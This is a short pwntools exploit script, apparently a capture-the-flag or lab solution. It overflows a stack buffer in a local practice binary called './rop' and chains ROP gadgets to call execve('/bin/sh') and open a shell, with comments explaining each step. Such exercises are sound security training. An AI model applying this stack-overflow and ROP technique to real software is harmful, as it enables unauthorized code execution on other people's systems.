#! /usr/bin/python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 howpwn <finn79426@gmail.com>
#
# Distributed under terms of the MIT license.

from pwn import *

# Exploit driver for the local `./rop` binary: overflow the stack buffer and
# return into a hand-built ROP chain that issues execve via `int 0x80`.
# Written against the Python 2 pwntools API (`#! /usr/bin/python`, str
# arguments to recvuntil/sendline); on Python 3 those calls expect bytes.
p = process("./rop")

# Consume the banner up to the first newline before sending the payload.
p.recvuntil("\n")

# `padding` is never referenced; the 112-byte offset to the saved return
# address is supplied directly by cyclic(112) below.
padding = 112
payload = cyclic(112)

###### Notes (translated) #####
# Once EIP is under our control, the goal is execve("/bin/sh", NULL, NULL).
# "/bin/sh\x00" already exists inside the program, so no address needs to be
# found to plant it — ebx just has to point at its location.
# Then set:  eax = 0xb   (the original note said 0x3b, but the chain on
#                        line 38 and the structure comment use 0xb; 0xb is
#                        the 32-bit-x86 int 0x80 execve number, 0x3b is the
#                        x86-64 one — treat 0x3b as a typo, confirm against
#                        the target)
#            ecx = 0
#            edx = 0
#            int 0x80
################

# Gadget addresses as given for this binary (not re-verified here).
# The fixed 0x08xxxxxx values only work if the binary is loaded at a fixed
# base — presumably non-PIE; PIE/ASLR would randomise them. TODO confirm.
binsh = 0x80be408
pop_eax = 0x080bb196
pop_ebx = 0x080481c9
pop_edx_ecx_ebx = 0x0806eb90 # for pop_ecx: the only ecx gadget also pops edx and ebx
pop_edx = 0x0806eb6a
int_0x80 = 0x08049421


# Payload structure:
# ecx = 0 -> ebx = binsh -> eax = 0xb -> edx = 0 -> int 0x80
# Order matters: pop_edx_ecx_ebx zeroes all three registers (including ebx),
# so ebx is re-set to binsh afterwards by pop_ebx; edx is set again last
# only for clarity, it is already 0 from the first gadget.
payload += flat([pop_edx_ecx_ebx, 0, 0, 0, pop_ebx, binsh, pop_eax, 0xb, pop_edx, 0, int_0x80])

p.sendline(payload)
p.interactive()

